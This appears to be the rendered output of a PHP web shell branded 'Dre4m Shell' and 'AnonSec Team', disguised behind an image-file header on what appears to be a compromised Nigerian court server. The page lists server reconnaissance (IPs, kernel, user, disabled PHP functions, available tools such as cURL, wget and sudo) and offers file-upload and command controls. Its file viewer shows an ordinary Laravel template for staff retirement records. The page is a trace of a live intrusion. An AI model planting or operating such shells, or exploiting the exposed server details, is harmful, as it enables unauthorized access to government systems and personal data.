ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.14.253.142
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/b095821dfc41c1b1a3de1c9deaf1990188bc3934.php
<?php $__env->startSection('pageTitle'); ?>
Staff Retirement
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    <div class="box box-default">
        <div class="box-header with-border hidden-print">
           <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?></h3>
        </div>
        
     <!-- Validation messages -->   
                <?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong>
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>

                <?php if(session('msg')): ?>
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong>
                        <?php echo session('msg'); ?>

                    </div>
                <?php endif; ?>

                <?php if(session('err')): ?>
                    <div class="alert alert-warning alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error Occured!</strong>
                        <?php echo session('err'); ?>

                    </div>
                <?php endif; ?>
        
      
    <!-- End Validation Message -->        
         
            
        <!--MAIN FORM --->
            <div class="box-body">
                <form method="post" action="<?php echo e(route('retirement.search')); ?>"  id="form1">
                        <?php echo e(csrf_field()); ?>

                        <!--hidden field for creating record-->                                   
                    <div class="row">          	 
                        <div class="col-md-4">                                      	
                            <label>Date</label>                       
                            <input type="date" name="search" value="<?php echo e($search); ?>" class="form-control input-lg" required/>                   
                        </div> 
                        <div style="padding-top: 30px;">
                            <button type="submit" name="button" class="btn btn-primary">Search</button>
                        </div>                       
                        <br>
                    </div>
                </form>
            
                <!--END OF MAIN FORM-->
            
                <br>
                <br>
            <div class="container">
                <table class="table table-hover table-striped table-bordered" style="overflow-x:auto;">
                    <caption style="color:#219C52; font-size:large; font-weight:bold; text-align:center;"> </caption>
                    <thead style="font-weight:bold;" class="thead-light">
                        <tr>
                            <td>S/N</td>
                            <td>Name</td>
                            <td>Designation</td>
                            <td>Grade Level</td>
                            <td>Date of Birth</td>
                            <td>Date of First Appointment</td>
                            <td>Retirement Date</td>
                        </tr>
                    </thead>
                    
                    <tbody>
                         <?php $i = 1; ?>
                        <?php $__currentLoopData = $retirements; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $retirement): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        
                        
                        <tr>
                            <td><?php echo e($i++); ?></td>
                            <td><?php echo e($retirement->name); ?></td> 
                            <td><?php echo e($retirement->designation); ?></td> 
                            <td><?php echo e($retirement->grade); ?></td> 
                            <td><?php echo e($retirement->dob); ?></td> 
                            <td><?php echo e($retirement->appointment_date); ?></td> 
                            <td><?php echo e($retirement->retirement_date); ?></td>           
                        </form>
                        
                        </tr>                            
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        
                    </tbody>
                </table>
            </div> 
            </div>
</div>
                                
           


<?php $__env->stopSection(); ?>
<?php $__env->startSection('scripts'); ?>

<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/retirement/index.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team